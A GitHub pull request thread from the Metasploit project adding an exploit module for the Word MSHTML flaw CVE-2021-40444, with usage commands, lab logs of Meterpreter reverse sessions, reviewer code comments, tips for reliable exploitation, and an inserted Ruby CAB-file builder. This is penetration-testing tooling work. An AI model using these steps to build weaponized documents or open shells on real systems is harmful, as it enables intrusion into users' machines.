
Added module for CVE-2021-40444 #15742


Merged: 19 commits, Dec 8, 2021

Conversation

@thesunRider (Contributor) commented Oct 4, 2021

This PR is for CVE-2021-40444; the module can be used to generate malicious docx files which, when opened in a vulnerable MS Word, will spawn reverse shells. This was developed on demand from #15694

The exploit doesn't seem to work on pirated versions of the targeted software.

Verification

  • Start msfconsole
  • use exploit/windows/fileformat/office_word_docx
  • Configure options
  • run

Updates, including sending additional files once the payload connects back, will be shown as debug output.

## Running the module
You can use the module like this:

 use exploit/windows/fileformat/office_word_docx
 set lhost <>
 set SRVHOST <>
 set SRVPORT <>
 run

Copy payload.docx to the target machine and open it; if everything goes well you should see a meterpreter popping up :-)

@bwatters-r7 bwatters-r7 self-assigned this Oct 4, 2021
@bwatters-r7 bwatters-r7 added the rn-modules (release notes for new or majorly enhanced modules) and module labels Oct 4, 2021
Review comment (Contributor) on the diff at create_cabfile:

    end

    #create cab file
    def create_cabfile(input_data)

Nice! I was afraid we'd need to use a local binary to do this....
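The method under review builds the CAB container in Ruby instead of calling out to a local binary. As an added illustration of what that involves (example code written for this page, not the module's code; the function names, the DOS timestamp and the sample file name are assumptions), here is a minimal MSCF writer and reader in pure Ruby that computes and re-verifies the CFDATA checksum the MS-CAB format requires. The per-block checksums the module prints later in this thread ("Data block added w/ checksum: ...") are the same quantity.

```ruby
# Added example (not the PR module's code): a minimal Microsoft Cabinet (MSCF)
# writer and reader in pure Ruby. One folder, one file, no compression; the file
# data is split into CFDATA blocks of at most 0x8000 bytes as the format requires.
# Structure sizes and offsets follow the MS-CAB specification.

# CSUMCompute from the MS-CAB spec: XOR of little-endian 32-bit words; any
# trailing 1-3 bytes are packed high-to-low (the spec's switch fall-through).
def cab_csum_compute(bytes, seed = 0)
  csum = seed
  words = bytes.bytesize / 4
  words.times { |i| csum ^= bytes.byteslice(i * 4, 4).unpack1('V') }
  rest = bytes.byteslice(words * 4, bytes.bytesize - words * 4).bytes
  ul = case rest.length
       when 3 then (rest[0] << 16) | (rest[1] << 8) | rest[2]
       when 2 then (rest[0] << 8) | rest[1]
       when 1 then rest[0]
       else 0
       end
  csum ^ ul
end

# CFDATA.csum covers the block payload first, then the cbData/cbUncomp fields,
# seeded with the payload checksum.
def cab_data_checksum(block, cb_data, cb_uncomp)
  cab_csum_compute([cb_data, cb_uncomp].pack('vv'), cab_csum_compute(block))
end

# Build a cabinet holding one uncompressed file. Returns a binary String.
def build_cab(filename, content, block_size: 0x8000)
  raise ArgumentError, 'filename must not be empty' if filename.empty?
  coff_files = 36 + 8                                      # CFHEADER (36) + one CFFOLDER (8)
  coff_cabstart = coff_files + 16 + filename.bytesize + 1  # first CFDATA follows the CFFILE entry

  blocks = content.bytesize.zero? ? [''.b] : content.bytes.each_slice(block_size).map { |s| s.pack('C*') }
  cfdata = blocks.map do |b|
    [cab_data_checksum(b, b.bytesize, b.bytesize), b.bytesize, b.bytesize].pack('Vvv') + b
  end.join

  cb_cabinet = coff_cabstart + cfdata.bytesize
  # CFHEADER: signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
  # versionMinor=3, versionMajor=1, cFolders, cFiles, flags, setID, iCabinet
  header = ['MSCF', 0, cb_cabinet, 0, coff_files, 0, 3, 1, 1, 1, 0, 0x1234, 0].pack('a4VVVVVCCvvvvv')
  # CFFOLDER: coffCabStart, cCFData, typeCompress (0 = none)
  folder = [coff_cabstart, blocks.length, 0].pack('Vvv')
  # CFFILE: cbFile, uoffFolderStart, iFolder, DOS date (assumed 2021-09-01), DOS time,
  # attribs (archive), then the NUL-terminated name
  file = [content.bytesize, 0, 0, 0x5321, 0, 0x20].pack('VVvvvv') + filename + "\0"

  (header + folder + file + cfdata).b
end

# Parse a cabinet written by build_cab, re-checking every CFDATA checksum.
# Returns { name:, data: }; raises on any structural or checksum problem.
def read_cab(cab)
  raise 'bad signature' unless cab.byteslice(0, 4) == 'MSCF'
  cb_cabinet, coff_files = cab.byteslice(8, 4).unpack1('V'), cab.byteslice(16, 4).unpack1('V')
  raise 'cbCabinet does not match actual size' unless cb_cabinet == cab.bytesize
  n_folders, n_files = cab.byteslice(26, 4).unpack('vv')
  raise 'only 1 folder / 1 file supported' unless n_folders == 1 && n_files == 1
  coff_cabstart, n_blocks, type_compress = cab.byteslice(36, 8).unpack('Vvv')
  raise 'compressed folders not supported' unless type_compress == 0
  cb_file = cab.byteslice(coff_files, 4).unpack1('V')
  name_start = coff_files + 16
  name = cab.byteslice(name_start, cab.index("\0", name_start) - name_start)

  data = ''.b
  pos = coff_cabstart
  n_blocks.times do
    csum, cb_data, cb_uncomp = cab.byteslice(pos, 8).unpack('Vvv')
    block = cab.byteslice(pos + 8, cb_data)
    raise 'truncated CFDATA' unless block && block.bytesize == cb_data
    raise 'CFDATA checksum mismatch' unless csum == cab_data_checksum(block, cb_data, cb_uncomp)
    data << block
    pos += 8 + cb_data
  end
  raise 'file size mismatch' unless data.bytesize == cb_file
  { name: name, data: data }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample input; the file name and content are placeholders.
  cab = build_cab('payload.dll', 'A' * 70_000)
  puts "cabinet: #{cab.bytesize} bytes, file data: #{read_cab(cab)[:data].bytesize} bytes"
end
```

Running the file builds a 70,000-byte sample (three CFDATA blocks) and parses it back. `read_cab` rejects any block whose checksum no longer matches, which is a quick sanity check on a hand-built cabinet before handing it to Word.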

@github-actions bot commented Oct 4, 2021

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@gwillcox-r7 gwillcox-r7 added the needs-linting (The module needs additional work to pass our automated linting rules) label Oct 4, 2021
@github-actions bot commented Oct 4, 2021

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@thesunRider (Contributor, Author)

Is it possible to give the hacktoberfest label to this pull?

surya added 4 commits October 8, 2021 02:50
=> Added Deobfuscated HTML Payload
=> Removed Extra Author Credits
=> Made SRVHOST AND SRVPORT MANDATORY
=> generate_uri replaced with builtin get_uri
@void-in (Contributor) commented Oct 8, 2021

The debug_script.rc file should be removed from the PR. I believe this is your debug script for testing.

@88JC commented Oct 9, 2021

> This PR is for CVE-2021-40444; the module can be used to generate malicious docx files which, when run on a vulnerable MS Word, will spawn reverse shells. This was developed on demand from #15694
>
> The exploit doesn't seem to work on pirated versions of the targeted software.
>
> Verification
>
>   • Start msfconsole
>   • use exploit/windows/fileformat/office_word_docx
>   • Configure options
>   • run
>
> Updates including sending additional files once the payload connects back will be shown as debug output
>
> ## Running the module
> You can use the module like this:
>
>  use exploit/windows/fileformat/office_word_docx
>  set lhost <>
>  set SRVHOST <>
>  set SRVPORT <>
>  run
>
> Copy payload.docx to the target machine and run it; if everything goes well, you will see a meterpreter pop up :-)

why is it not in my metasploit?

@mekhalleh (Contributor)

Hello @thesunRider, @bwatters-r7, @smcintyre-r7

I made a lot of modifications based on this module's logic (exploit using cab file)

As this has not changed for 1 month, can I join this PR to add this?

@bwatters-r7 (Contributor)

Hey @thesunRider and @mekhalleh! Sorry this has been sitting for a bit. I've had some other things crop up as priorities, but absolutely, @mekhalleh please feel free to PR to this branch. I'm happy to check it out and work with you all on integration and landing next week, as this is going to be my priority next week again, so thanks everyone for their patience!

@mekhalleh (Contributor)

I thought I could attach myself to this PR but obviously not. Sorry in advance, this created another PR...

-> #15848

@mekhalleh (Contributor)

It's done. I've added the PR.

@mekhalleh (Contributor) commented Nov 11, 2021

> FWIW, I'm not getting a session.... I need to figure out why:

@bwatters-r7 have you licensed your Microsoft Office? This doesn't work on an unlicensed version.

Otherwise you must share with me the files generated by the exploit.

Example:

EDIT: And DON'T run the docx from a shared folder... copy the docx to the local disk.

@mekhalleh (Contributor) commented Nov 11, 2021

I'll collect the rules of use here:

  • This exploit doesn't work on unlicensed Microsoft Office versions. A licensed Windows is NOT necessary (Microsoft Office only)
  • DON'T run the docx from a shared folder; copy the docx to the local disk.
  • When you get a session, you must kill the active session before running the exploit again.
  • Oh, the cab file is taken from the IE cache if it has already been downloaded, so keeping the dynamic name for testing is a good idea.

@bwatters-r7 (Contributor)

Odd.... I tried a half-dozen different things, then out of frustration, I reset my VM and immediately got a session.....

msf6 exploit(windows/fileformat/word_mshtml_rce) > show options

Module options (exploit/windows/fileformat/word_mshtml_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        msf.docx         no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/word_mshtml_rce) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(windows/fileformat/word_mshtml_rce) > set srvhost 10.5.135.101
srvhost => 10.5.135.101
msf6 exploit(windows/fileformat/word_mshtml_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf6 exploit(windows/fileformat/word_mshtml_rce) > [*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Using URL: http://10.5.135.101:8080/2kLQmLIYt
[*] Server started.
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] Sending stage (200262 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:50994) at 2021-11-16 10:41:50 -0600

msf6 exploit(windows/fileformat/word_mshtml_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > exit

@bwatters-r7 (Contributor) left a comment

Hi there! Sorry this took so long to get to!
I have a couple thoughts: First, there's a lot of code duplication between the auxiliary and exploit modules. The easiest solution might be to rework the exploit module so that the auxiliary module is no longer needed, but if we need to keep both, we should move the methods to a shared library based on the reusability of the code. Offhand, I think that the cab creation method could be used by others and should get located in the rex-zip library, but the others are less likely to be reused and I'm not entirely sure where those should live if we decide to keep both modules. Possibly lib/msf/core/util/?

@bwatters-r7 (Contributor)

Yeah; I'm liking the idea of combining the auxiliary and exploit modules into a single exploit module. You can use the payload of your choice by specifying `set payload generic/custom` and you can enable/disable the httpserver and the handler based on the target type. Maybe have a hosted target and an unhosted target?
To prevent the handler, you could add `'DisablePayloadHandler' => true` in the default options for the unhosted target. See `modules/exploits/freebsd/webapps/spamtitain_unauth_rce` for an example of changing default options based on target data.

@bwatters-r7 (Contributor)

Hrm...... let me see if I can knock out those changes in a PR..... give me a bit.

@bwatters-r7 (Contributor)

Still trying to figure out the best way to toggle that HTTP server....

@mekhalleh (Contributor)

> Still trying to figure out the best way to toggle that HTTP server....

Initially, I had done only one module. Come to think of it I split this because I didn't figure out how to disable the web server.

@bwatters-r7 (Contributor)

I was able to successfully do a HTTP server toggle by overwriting the exploit method: thesunRider#2
It is not perfect, but it does work. I'm still not sure why it says the exploit failed, but then proceeds to work. It might have something to do with exiting the exploit method before bumping up to the super's exploit method.

@mekhalleh (Contributor)

hello @thesunRider, can you merge the PR from @bwatters-r7 pls ?

@mekhalleh (Contributor)

Thank you very much @thesunRider, I'm very busy again this week but I will try to finish the job:

  • Remove the old auxiliary module and its doc
  • Modify the doc for the RCE module before merging it
  • Last check, ...

The next commit should be the last one before merging this.

@bwatters-r7 (Contributor)

Hey @thesunRider and @mekhalleh! I wanted to let you know that this is a holiday week in the US so I won't be doing much work on this until Monday, but if you are OK with all the changes suggested, I can do the cleanup, module removal, module doc change, and retest next week while I'm landing it to save some time for you both. Because I made some changes, I need to get another committer to OK them, but I can take care of that, too, and that would not happen until next week, either. If you are both OK with the changes on removing the aux module and updating the docs, I can take care of it all next week.
I appreciate the time you spent on this, so I'm happy to do the last little bit of polish landing it if you are busy.

@thesunRider (Contributor, Author)

I am having a bit of a rush with my schedule; I will try to do @mekhalleh's task list if time allows.

Happy holidays @bwatters-r7

@mekhalleh (Contributor)

Yes, it is a good idea @bwatters-r7, I did not dare to suggest it to you ...

It's OK for me, I'll let you make the changes. As always, I am delighted to contribute; it's a real pleasure.

Thanks a lot @thesunRider 👯

And have a good holiday ;)

Review comment (Contributor) on the diff at the SRVHOST handling:

    @proto = (datastore['SSL'] ? 'https' : 'http')
    if datastore['SRVHOST'] == '0.0.0.0'
      datastore['SRVHOST'] = Rex::Socket.source_address('1.2.3.4')

It's not necessary to pass in 1.2.3.4. The function provides a default public address already.

Review comment (Contributor) on the diff at the exploit method:

    end

    def exploit
      print_status("target.name = #{target.name}")

If we're going to print the target here, can we make it a little more descriptive so it doesn't look like debug output?

@bwatters-r7 (Contributor)

I've pulled a cleaner set of javascript and incorporated it, but I'm now getting an odd problem where I get code execution, but the session fails to establish.
I know I'm getting code execution because if I switch to a pingback payload, I can catch the UUID in transit with wireshark, but it does not appear to process the callback at all. I get the same results with the original codebase and a snapshot that was working two weeks ago...
More digging is required.

msf6 exploit(windows/fileformat/word_mshtml_rce) > [*] Local IP: http://10.5.135.101:8080/qachy7ovfeULB7C
[*] Server started.
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
[*] Parsing item from template: [Content_Types].xml
[*] Parsing item from template: _rels/
[*] Parsing item from template: _rels/.rels
[*] Parsing item from template: docProps/
[*] Parsing item from template: docProps/core.xml
[*] Parsing item from template: docProps/app.xml
[*] Parsing item from template: word/
[*] Parsing item from template: word/theme/
[*] Parsing item from template: word/theme/theme1.xml
[*] Parsing item from template: word/styles.xml
[*] Parsing item from template: word/settings.xml
[*] Parsing item from template: word/document.xml
[*] Parsing item from template: word/_rels/
[*] Parsing item from template: word/_rels/document.xml.rels
[*] Parsing item from template: word/fontTable.xml
[*] Parsing item from template: word/webSettings.xml
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 483e09a1
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 7e6fb805
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 483e09a1
[*] 10.5.132.101     word_mshtml_rce - Data block added w/ checksum: 7e6fb805
[*] Sending stage (200262 bytes) to 10.5.132.101

@bwatters-r7 (Contributor)

For what it is worth, I'm still working on this. I've discovered that somehow, we have managed to create a strange handler state.
Right now, if I had to guess, we're creating a 'ghost' handler that is isolated somehow from the OS, then creating a second handler... It may be a race condition to see which handler handles? I'm still a bit confused what is happening under the hood...
You can see how this is messed up by setting DisablePayloadHandler to true, then running the exploit a couple times. Despite not asking for a handler, we get one... for each run, all on the same port/IP, which should not be possible. What's more fun is that they are in no way connected to any listening sockets as far as the OS knows:

@bwatters-r7 (Contributor)

On at least three occasions I thought I figured this out. I've been unable to obtain results consistently, though.
I was able to watch a session get created, but not registered in the console: I watched the keep-alive messages go across an established TCP connection, but I can't reproduce it with any confidence. I can see and reproduce the ghost connections I thought were to blame before, but they are just sort of imaginary listeners that don't seem to affect anything, and I don't even think they are limited to this module.
There was a period when resetting DisablePayloadHandler or resetting the target (which resets DisablePayloadHandler) seemed to mitigate all issues, but then I was able to get repeated sessions without resetting it. I've been able to get repeatable sessions mostly through just running it over and over again now. Doubtless this seems flaky, failing on 1-2 attempts out of 5, but the result is not problematic and you can rerun it again. I'm trying to determine if there's a temporal limit to how frequently I can run it, but it would be a matter of seconds if it were, and that's not feasibly useful.
The listener is not killed after the connection, but that's not a big deal. I can just kill it and rerun without much of an issue. I have not been able to recreate the issue where I get a session hidden from msfconsole, so I can't troubleshoot it.
I've bisected the commits and there's just no consistent behavior. It seems flakier after I combined the modules, but I simply cannot get a definitive answer.
I'm going to start re-adding some of the changes @smcintyre-r7 suggested and just cautiously move forward. I wish I had at least more consistent results, but sometimes exploits are just weird and finite state machines are not as finite as we'd like.

@bwatters-r7 (Contributor)

Huh..... OK. I think I see how I did this, now.
When I re-added the deobfuscated js, it all came back. I have now pinned this odd behavior down to including Msf::Post::File, which I used to get access to exploit_data to pull the js from a data file. It apparently comes with other baggage, as I can now reliably get the odd Handler behavior by adding/removing Msf::Post::File.

Split out javascript to a file and deobfuscate it
Update documentation for new targets
Fix other small suggestions
@bwatters-r7 (Contributor)

Retest

       =[ metasploit v6.1.9-dev-852230c739                ]
+ -- --=[ 2168 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file

msf6 exploit(windows/fileformat/word_mshtml_rce) > set target 0
target => 0
msf6 exploit(windows/fileformat/word_mshtml_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/word_mshtml_rce) > 
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Using URL: http://0.0.0.0:8080/ENjTanm
[*] Local IP: http://10.5.135.101:8080/ENjTanm
[*] Server started.
[*] CVE-2021-40444: Generate a malicious docx file
[*] Using template '/home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2021-40444.docx'
[*] Injecting payload in docx document
[*] Finalizing docx 'msf.docx'
[+] msf.docx stored at /home/tmoose/.msf4/local/msf.docx
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending HTML Payload
[*] 10.5.132.101     word_mshtml_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] 10.5.132.101     word_mshtml_rce - Sending CAB Payload
[*] Sending stage (200262 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4444 -> 10.5.132.101:51075) at 2021-12-08 11:27:41 -0600

msf6 exploit(windows/fileformat/word_mshtml_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > 


It's not currently working and Metasploit should just handle everything
@smcintyre-r7 smcintyre-r7 merged commit 1915b13 into rapid7:master Dec 8, 2021
@smcintyre-r7 (Contributor)

Release Notes

This adds an exploit for CVE-2021-40444 which is a vulnerability that affects Microsoft Word. Successful exploitation results in code execution in the context of the user running Microsoft Word.

@bcoles bcoles mentioned this pull request Jan 18, 2022
Labels: hacktoberfest-accepted, module, needs-docs, needs-linting (The module needs additional work to pass our automated linting rules), rn-modules (release notes for new or majorly enhanced modules)

8 participants